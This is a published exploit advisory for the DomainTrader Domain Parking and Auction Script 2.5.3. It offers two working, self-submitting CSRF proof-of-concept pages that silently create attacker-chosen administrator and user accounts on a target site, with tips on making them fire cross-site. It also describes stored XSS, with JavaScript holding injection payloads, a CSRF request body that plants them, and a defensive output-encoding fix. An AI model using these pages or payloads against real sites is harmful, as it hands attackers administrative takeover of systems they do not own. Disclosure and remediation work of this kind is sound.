DomainTrader Domain Parking / Auction Script 2.5.3 CSRF / XSS



EKU-ID: 4218 CVE: OSVDB-ID:
Author: Haider Mahmood Published: 2014-08-29 Verified: Verified


# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities
# Google Dork: Find yourself xD
# Date: 26/8/2014
# Exploit Author: Haider Mahmood | @HaiderMQ
# Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/
# Version: Tested on Latest Version 2.5.3

Add new administrator CSRF (admin/admincp.php, mode=addadminuser). The request carries no anti-CSRF token, so an administrator who opens the page below while logged in gets a new administrator account created with attacker-chosen username, e-mail address and password:


<!-- Auto-submits the form as soon as the page loads; the victim only has to open it while logged in to the admin panel -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
    window.document.forms[0].submit();
  });
</script>
<!-- Replace victim.com with the target host. The scheme is required: without it the browser treats the action as a relative path on the attacker's own host and the request never reaches the target -->
<form name="add_admin" id="add_admin" method="post" action="http://victim.com/admin/admincp.php">
    <input type="hidden" name="mode" value="addadminuser" />
      <table width="400" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td>Username:</td>
          <td><input name="username" type="text" value="USERNAME" /></td>
        </tr>
        <tr>
          <td>Email Address:</td>
          <td><input name="email_address" type="text" value="EMAIL_ADDRESS" /></td>
        </tr>
        <tr>
          <td>Password:</td>
          <td><input name="password" type="text" value="DESIRED_PASSWORD" /></td>
        </tr>
        <tr>
          <td><input name="submit" type="submit" value="Add User" /></td>
          <td>&nbsp;</td>
        </tr>
      </table>
    </form>


Add new user CSRF (admin/admincp.php, mode=addnewuser). Same missing token; this one creates an ordinary user account with attacker-chosen details:

<!-- Auto-submits on load, exactly as the administrator PoC above -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
    window.document.forms[0].submit();
  });
</script>
<!-- Replace victim.com with the target host; the scheme is required so the browser posts cross-site rather than to a relative path -->
<form name="add_user" id="add_user" method="post" action="http://victim.com/admin/admincp.php">
    <input type="hidden" name="mode" value="addnewuser">
      <table width="500" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td><span>Username:</span></td>
            <td><input type="text" name="user_name" id="user_name" value="USERNAME_VALUE"></td>
          </tr>
          <tr>
            <td><span>Password:</span></td>
            <td><input type="password" name="newpassword" id="newpassword" value="DESIRED_PASSWORD"></td>
          </tr>
          <tr>
            <td><span>Confirm Password:</span></td>
            <td><input type="password" name="cnewpassword" id="cnewpassword" value="DESIRED_PASSWORD"></td>
          </tr>
          <tr>
            <td width="200"><span>First Name:</span></td>
            <td width="300"><input type="text" name="first_name" id="first_name" value="FIRSTNAME"></td>
          </tr>
          <tr>
            <td><span>Last Name:</span></td>
            <td><input type="text" name="last_name" id="last_name" value="LASTNAME"></td>
          </tr>
          <tr>
            <td><span>Email Address:</span></td>
            <td><input type="text" name="email_address" id="email_address" value="DESIRED_VALUE"></td>
          </tr>
          <tr>
            <td><span>Telephone:</span></td>
            <td><input type="text" name="telephone" id="telephone" value="010101010"></td>
          </tr>
          <tr>
            <td><span>Street Address:</span></td>
            <td><input type="text" name="street_address" id="street_address" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>City:</span></td>
            <td><input type="text" name="city" id="city" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>County/State:</span></td>
            <td><input type="text" name="county" id="county" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>Postcode/Zipcode:</span></td>
            <td><input type="text" name="postcode" id="postcode" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>Country:</span></td>
            <td>
              <select name="country" id="country">
                                                  <option value="AFGHANISTAN">AFGHANISTAN</option>
                                                                  <option value="ALBANIA">ALBANIA</option>
                                                                  <option value="ALGERIA">ALGERIA</option>
                                                                  <option value="AMERICAN SAMOA">AMERICAN SAMOA</option>
                                                                  <option value="ANDORRA">ANDORRA</option>
                                                                  <option value="ANGOLA">ANGOLA</option>
                                                                  <option value="ANTIGUA AND BARBUDA">ANTIGUA AND BARBUDA</option>
                                                                  <option value="ARGENTINA">ARGENTINA</option>
                                                                  <option value="ARMENIA">ARMENIA</option>
                                                                  <option value="ARUBA">ARUBA</option>
                                                                  <option value="AUSTRALIA">AUSTRALIA</option>
                                                                  <option value="AUSTRIA">AUSTRIA</option>
                                                                  <option value="AZERBAIJAN">AZERBAIJAN</option>
                                                                  <option value="BAHAMAS">BAHAMAS</option>
                                                                  <option value="BAHRAIN">BAHRAIN</option>
                                                                  <option value="BANGLADESH">BANGLADESH</option>
                                                                  <option value="BARBADOS">BARBADOS</option>
                                                                  <option value="BELARUS">BELARUS</option>
                                                                  <option value="BELGIUM">BELGIUM</option>
                                                                  <option value="BELIZE">BELIZE</option>
                                                                  <option value="BENIN">BENIN</option>
                                                                  <option value="BERMUDA">BERMUDA</option>
                                                                  <option value="BHUTAN">BHUTAN</option>
                                                                  <option value="BOLIVIA">BOLIVIA</option>
                                                                  <option value="BOSNIA AND HERZEGOVINA">BOSNIA AND HERZEGOVINA</option>
                                                                  <option value="BOTSWANA">BOTSWANA</option>
                                                                  <option value="BRAZIL">BRAZIL</option>
                                                                  <option value="BRITISH INDIAN OCEAN TERRITORY">BRITISH INDIAN OCEAN TERRITORY</option>
                                                                  <option value="BRUNEI DARUSSALAM">BRUNEI DARUSSALAM</option>
                                                                  <option value="BULGARIA">BULGARIA</option>
                                                                  <option value="BURKINA FASO">BURKINA FASO</option>
                                                                  <option value="BURUNDI">BURUNDI</option>
                                                                  <option value="CAMBODIA">CAMBODIA</option>
                                                                  <option value="CAMEROON">CAMEROON</option>
                                                                  <option value="CANADA">CANADA</option>
                                                                  <option value="CAPE VERDE">CAPE VERDE</option>
                                                                  <option value="CAYMAN ISLANDS">CAYMAN ISLANDS</option>
                                                                  <option value="CENTRAL AFRICAN REPUBLIC">CENTRAL AFRICAN REPUBLIC</option>
                                                                  <option value="CHAD">CHAD</option>
                                                                  <option value="CHILE">CHILE</option>
                                                                  <option value="CHINA">CHINA</option>
                                                                  <option value="COLOMBIA">COLOMBIA</option>
                                                                  <option value="COMOROS">COMOROS</option>
                                                                  <option value="CONGO">CONGO</option>
                                                                  <option value="COOK ISLANDS">COOK ISLANDS</option>
                                                                  <option value="COSTA RICA">COSTA RICA</option>
                                                                  <option value="COTE D'IVOIRE">COTE D'IVOIRE</option>
                                                                  <option value="CROATIA">CROATIA</option>
                                                                  <option value="CUBA">CUBA</option>
                                                                  <option value="CYPRUS">CYPRUS</option>
                                                                  <option value="CZECH REPUBLIC">CZECH REPUBLIC</option>
                                                                  <option value="DENMARK">DENMARK</option>
                                                                  <option value="DJIBOUTI">DJIBOUTI</option>
                                                                  <option value="DOMINICA">DOMINICA</option>
                                                                  <option value="DOMINICAN REPUBLIC">DOMINICAN REPUBLIC</option>
                                                                  <option value="ECUADOR">ECUADOR</option>
                                                                  <option value="EGYPT">EGYPT</option>
                                                                  <option value="EL SALVADOR">EL SALVADOR</option>
                                                                  <option value="EQUATORIAL GUINEA">EQUATORIAL GUINEA</option>
                                                                  <option value="ERITREA">ERITREA</option>
                                                                  <option value="ESTONIA">ESTONIA</option>
                                                                  <option value="ETHIOPIA">ETHIOPIA</option>
                                                                  <option value="FALKLAND ISLANDS (MALVINAS)">FALKLAND ISLANDS (MALVINAS)</option>
                                                                  <option value="FAROE ISLANDS">FAROE ISLANDS</option>
                                                                  <option value="FEDERATED STATES OF MICRONESIA">FEDERATED STATES OF MICRONESIA</option>
                                                                  <option value="FIJI">FIJI</option>
                                                                  <option value="FINLAND">FINLAND</option>
                                                                  <option value="FRANCE">FRANCE</option>
                                                                  <option value="FRENCH GUIANA">FRENCH GUIANA</option>
                                                                  <option value="FRENCH POLYNESIA">FRENCH POLYNESIA</option>
                                                                  <option value="FRENCH SOUTHERN TERRITORIES">FRENCH SOUTHERN TERRITORIES</option>
                                                                  <option value="GABON">GABON</option>
                                                                  <option value="GAMBIA">GAMBIA</option>
                                                                  <option value="GEORGIA">GEORGIA</option>
                                                                  <option value="GERMANY">GERMANY</option>
                                                                  <option value="GHANA">GHANA</option>
                                                                  <option value="GIBRALTAR">GIBRALTAR</option>
                                                                  <option value="GREECE">GREECE</option>
                                                                  <option value="GREENLAND">GREENLAND</option>
                                                                  <option value="GRENADA">GRENADA</option>
                                                                  <option value="GUADELOUPE">GUADELOUPE</option>
                                                                  <option value="GUAM">GUAM</option>
                                                                  <option value="GUATEMALA">GUATEMALA</option>
                                                                  <option value="GUINEA">GUINEA</option>
                                                                  <option value="GUINEA-BISSAU">GUINEA-BISSAU</option>
                                                                  <option value="GUYANA">GUYANA</option>
                                                                  <option value="HAITI">HAITI</option>
                                                                  <option value="HOLY SEE (VATICAN CITY STATE)">HOLY SEE (VATICAN CITY STATE)</option>
                                                                  <option value="HONDURAS">HONDURAS</option>
                                                                  <option value="HONG KONG">HONG KONG</option>
                                                                  <option value="HUNGARY">HUNGARY</option>
                                                                  <option value="ICELAND">ICELAND</option>
                                                                  <option value="INDIA">INDIA</option>
                                                                  <option value="INDONESIA">INDONESIA</option>
                                                                  <option value="IRAQ">IRAQ</option>
                                                                  <option value="IRELAND">IRELAND</option>
                                                                  <option value="ISLAMIC REPUBLIC OF IRAN">ISLAMIC REPUBLIC OF IRAN</option>
                                                                  <option value="ISRAEL">ISRAEL</option>
                                                                  <option value="ITALY">ITALY</option>
                                                                  <option value="JAMAICA">JAMAICA</option>
                                                                  <option value="JAPAN">JAPAN</option>
                                                                  <option value="JORDAN">JORDAN</option>
                                                                  <option value="KAZAKHSTAN">KAZAKHSTAN</option>
                                                                  <option value="KENYA">KENYA</option>
                                                                  <option value="KIRIBATI">KIRIBATI</option>
                                                                  <option value="KUWAIT">KUWAIT</option>
                                                                  <option value="KYRGYZSTAN">KYRGYZSTAN</option>
                                                                  <option value="LAO PEOPLE'S DEMOCRATIC REPUBLIC">LAO PEOPLE'S DEMOCRATIC REPUBLIC</option>
                                                                  <option value="LATVIA">LATVIA</option>
                                                                  <option value="LEBANON">LEBANON</option>
                                                                  <option value="LESOTHO">LESOTHO</option>
                                                                  <option value="LIBERIA">LIBERIA</option>
                                                                  <option value="LIBYAN ARAB JAMAHIRIYA">LIBYAN ARAB JAMAHIRIYA</option>
                                                                  <option value="LIECHTENSTEIN">LIECHTENSTEIN</option>
                                                                  <option value="LITHUANIA">LITHUANIA</option>
                                                                  <option value="LUXEMBOURG">LUXEMBOURG</option>
                                                                  <option value="MACAO">MACAO</option>
                                                                  <option value="MADAGASCAR">MADAGASCAR</option>
                                                                  <option value="MALAWI">MALAWI</option>
                                                                  <option value="MALAYSIA">MALAYSIA</option>
                                                                  <option value="MALDIVES">MALDIVES</option>
                                                                  <option value="MALI">MALI</option>
                                                                  <option value="MALTA">MALTA</option>
                                                                  <option value="MARSHALL ISLANDS">MARSHALL ISLANDS</option>
                                                                  <option value="MARTINIQUE">MARTINIQUE</option>
                                                                  <option value="MAURITANIA">MAURITANIA</option>
                                                                  <option value="MAURITIUS">MAURITIUS</option>
                                                                  <option value="MEXICO">MEXICO</option>
                                                                  <option value="MONACO">MONACO</option>
                                                                  <option value="MONGOLIA">MONGOLIA</option>
                                                                  <option value="MOROCCO">MOROCCO</option>
                                                                  <option value="MOZAMBIQUE">MOZAMBIQUE</option>
                                                                  <option value="MYANMAR">MYANMAR</option>
                                                                  <option value="NAMIBIA">NAMIBIA</option>
                                                                  <option value="NAURU">NAURU</option>
                                                                  <option value="NEPAL">NEPAL</option>
                                                                  <option value="NETHERLANDS">NETHERLANDS</option>
                                                                  <option value="NETHERLANDS ANTILLES">NETHERLANDS ANTILLES</option>
                                                                  <option value="NEW CALEDONIA">NEW CALEDONIA</option>
                                                                  <option value="NEW ZEALAND">NEW ZEALAND</option>
                                                                  <option value="NICARAGUA">NICARAGUA</option>
                                                                  <option value="NIGER">NIGER</option>
                                                                  <option value="NIGERIA">NIGERIA</option>
                                                                  <option value="NORTHERN MARIANA ISLANDS">NORTHERN MARIANA ISLANDS</option>
                                                                  <option value="NORWAY">NORWAY</option>
                                                                  <option value="OMAN">OMAN</option>
                                                                  <option value="PAKISTAN">PAKISTAN</option>
                                                                  <option value="PALAU">PALAU</option>
                                                                  <option value="PALESTINIAN TERRITORY">PALESTINIAN TERRITORY</option>
                                                                  <option value="PANAMA">PANAMA</option>
                                                                  <option value="PAPUA NEW GUINEA">PAPUA NEW GUINEA</option>
                                                                  <option value="PARAGUAY">PARAGUAY</option>
                                                                  <option value="PERU">PERU</option>
                                                                  <option value="PHILIPPINES">PHILIPPINES</option>
                                                                  <option value="POLAND">POLAND</option>
                                                                  <option value="PORTUGAL">PORTUGAL</option>
                                                                  <option value="PUERTO RICO">PUERTO RICO</option>
                                                                  <option value="QATAR">QATAR</option>
                                                                  <option value="REPUBLIC OF KOREA">REPUBLIC OF KOREA</option>
                                                                  <option value="REPUBLIC OF MOLDOVA">REPUBLIC OF MOLDOVA</option>
                                                                  <option value="REUNION">REUNION</option>
                                                                  <option value="ROMANIA">ROMANIA</option>
                                                                  <option value="RUSSIAN FEDERATION">RUSSIAN FEDERATION</option>
                                                                  <option value="RWANDA">RWANDA</option>
                                                                  <option value="SAINT KITTS AND NEVIS">SAINT KITTS AND NEVIS</option>
                                                                  <option value="SAINT LUCIA">SAINT LUCIA</option>
                                                                  <option value="SAINT VINCENT AND THE GRENADINES">SAINT VINCENT AND THE GRENADINES</option>
                                                                  <option value="SAMOA">SAMOA</option>
                                                                  <option value="SAN MARINO">SAN MARINO</option>
                                                                  <option value="SAO TOME AND PRINCIPE">SAO TOME AND PRINCIPE</option>
                                                                  <option value="SAUDI ARABIA">SAUDI ARABIA</option>
                                                                  <option value="SENEGAL">SENEGAL</option>
                                                                  <option value="SERBIA AND MONTENEGRO">SERBIA AND MONTENEGRO</option>
                                                                  <option value="SEYCHELLES">SEYCHELLES</option>
                                                                  <option value="SIERRA LEONE">SIERRA LEONE</option>
                                                                  <option value="SINGAPORE">SINGAPORE</option>
                                                                  <option value="SLOVAKIA">SLOVAKIA</option>
                                                                  <option value="SLOVENIA">SLOVENIA</option>
                                                                  <option value="SOLOMON ISLANDS">SOLOMON ISLANDS</option>
                                                                  <option value="SOMALIA">SOMALIA</option>
                                                                  <option value="SOUTH AFRICA">SOUTH AFRICA</option>
                                                                  <option value="SPAIN">SPAIN</option>
                                                                  <option value="SRI LANKA">SRI LANKA</option>
                                                                  <option value="SUDAN">SUDAN</option>
                                                                  <option value="SURINAME">SURINAME</option>
                                                                  <option value="SWAZILAND">SWAZILAND</option>
                                                                  <option value="SWEDEN">SWEDEN</option>
                                                                  <option value="SWITZERLAND">SWITZERLAND</option>
                                                                  <option value="SYRIAN ARAB REPUBLIC">SYRIAN ARAB REPUBLIC</option>
                                                                  <option value="TAIWAN">TAIWAN</option>
                                                                  <option value="TAJIKISTAN">TAJIKISTAN</option>
                                                                  <option value="THAILAND">THAILAND</option>
                                                                  <option value="THE DEMOCRATIC REPUBLIC OF THE CONGO">THE DEMOCRATIC REPUBLIC OF THE CONGO</option>
                                                                  <option value="THE FORMER GOSLAV REPUBLIC OF MACEDONIA">THE FORMER GOSLAV REPUBLIC OF MACEDONIA</option>
                                                                  <option value="TIMOR-LESTE">TIMOR-LESTE</option>
                                                                  <option value="TOGO">TOGO</option>
                                                                  <option value="TOKELAU">TOKELAU</option>
                                                                  <option value="TONGA">TONGA</option>
                                                                  <option value="TRINIDAD AND TOBAGO">TRINIDAD AND TOBAGO</option>
                                                                  <option value="TUNISIA">TUNISIA</option>
                                                                  <option value="TURKEY">TURKEY</option>
                                                                  <option value="TURKMENISTAN">TURKMENISTAN</option>
                                                                  <option value="TUVALU">TUVALU</option>
                                                                  <option value="UGANDA">UGANDA</option>
                                                                  <option value="UKRAINE">UKRAINE</option>
                                                                  <option value="UNITED ARAB EMIRATES">UNITED ARAB EMIRATES</option>
                                                                  <option value="UNITED KINGDOM">UNITED KINGDOM</option>
                                                                  <option value="UNITED REPUBLIC OF TANZANIA">UNITED REPUBLIC OF TANZANIA</option>
                                                                  <option value="UNITED STATES">UNITED STATES</option>
                                                                  <option value="URUGUAY">URUGUAY</option>
                                                                  <option value="UZBEKISTAN">UZBEKISTAN</option>
                                                                  <option value="VANUATU">VANUATU</option>
                                                                  <option value="VENEZUELA">VENEZUELA</option>
                                                                  <option value="VIET NAM">VIET NAM</option>
                                                                  <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>
                                                                  <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>
                                                                  <option value="YEMEN">YEMEN</option>
                                                                  <option value="ZAMBIA">ZAMBIA</option>
                                                                  <option value="ZIMBABWE">ZIMBABWE</option>
                                              </select>
            </td>
          </tr>
          <tr>
            <td colspan="2"><input name="new_message_notify" type="checkbox" value="1"  /><span>Notify me by email when I receive a new message.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_received_notify" type="checkbox" value="1"  /><span>Notify me by email when I receive a new offer.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_accepted_notify" type="checkbox" value="1"  /><span>Notify me when an offer I made is accepted.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_cancelled_notify" type="checkbox" value="1"  /><span>Notify me when an offer I made is cancelled</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="counter_offer_notify" type="checkbox" value="1"  /><span>Notify me by email when a counter offer is made on a domain I own or am bidding on.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="domain_pushed_notify" type="checkbox" value="1"  /><span>Notify me by email when a domain is pushed.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="sale_complete_notify" type="checkbox" value="1"  /><span>Notify me by email when a domain sale is complete.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input type="submit" name="Submit" value="Submit"></td>
          </tr>
        </table>
    </form>


XSS:

The values submitted through the Add New Administrator form are not sanitized when they are inserted into the database and not encoded when they are read back and rendered, so an attacker-controlled value is stored and executes in the browser of whoever views it (persistent XSS). Because the same request has no CSRF protection, the payload can be planted through the administrator CSRF page above: the attacker needs no credentials, only a logged-in administrator who opens the page.
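The sentence above names two separate failures, on insert and on output. The following added example (not DomainTrader code) shows why fixing only the insert side with a tag-stripping "sanitizer" is not enough and why encoding at render time is the fix that holds. The admin-list markup, the field names username and email_address, and the payloads are constructed assumptions.

```javascript
// Added example, not DomainTrader code: stored XSS in the admin user list and
// the difference between stripping on insert and encoding on output.
// Markup, field names and payloads are constructed for illustration.

// The pattern the advisory describes: the stored value is concatenated
// straight into the page. Kept only as the "before".
function renderAdminRowVulnerable(user) {
  return '<tr><td>' + user.username + '</td><td>' + user.email_address + '</td></tr>';
}

// Encode the five characters that can break out of HTML text or a quoted
// attribute. Applied at output time, so the stored value can stay verbatim.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderAdminRow(user) {
  return '<tr><td>' + escapeHtml(user.username) + '</td><td>' + escapeHtml(user.email_address) + '</td></tr>';
}

// A naive insert-time "sanitizer" of the kind often bolted on after a report
// like this one: it removes <script> tags and nothing else.
function stripScriptTags(value) {
  return String(value).replace(/<\/?script[^>]*>/gi, '');
}

// Test helper: after removing the <tr>/<td> scaffolding, does the row still
// contain a tag the browser would parse? Encoded output never does.
function containsActiveMarkup(rowHtml) {
  const cells = rowHtml.replace(/<\/?t[rd]>/g, '');
  return /<[a-z]/i.test(cells);
}

// --- constructed payloads ---
const scriptPayload = {
  username: '<script>alert(document.cookie)</script>',
  email_address: 'a@example.org',
};
// No <script> tag at all, so stripScriptTags leaves it intact; the handler
// fires as soon as the broken image is rendered in the admin list.
const imgPayload = {
  username: '<img src=x onerror=alert(1)>',
  email_address: 'b@example.org',
};
const storedAfterStrip = {
  username: stripScriptTags(imgPayload.username),
  email_address: imgPayload.email_address,
};

// The chain with the CSRF issue: the same POST body the auto-submitting form
// sends, carrying the payload in the username field.
const csrfBody = 'mode=addadminuser&username=' + encodeURIComponent(imgPayload.username) +
  '&email_address=b%40example.org&password=x&submit=Add+User';
const chainedUsername = new URLSearchParams(csrfBody).get('username');
```

Storing the raw value and encoding it everywhere it is rendered is the standard fix; the encoding has to match the output context (the function above covers text and quoted attributes, not JavaScript or URL contexts), and it is applied in addition to, not instead of, the CSRF token on the form.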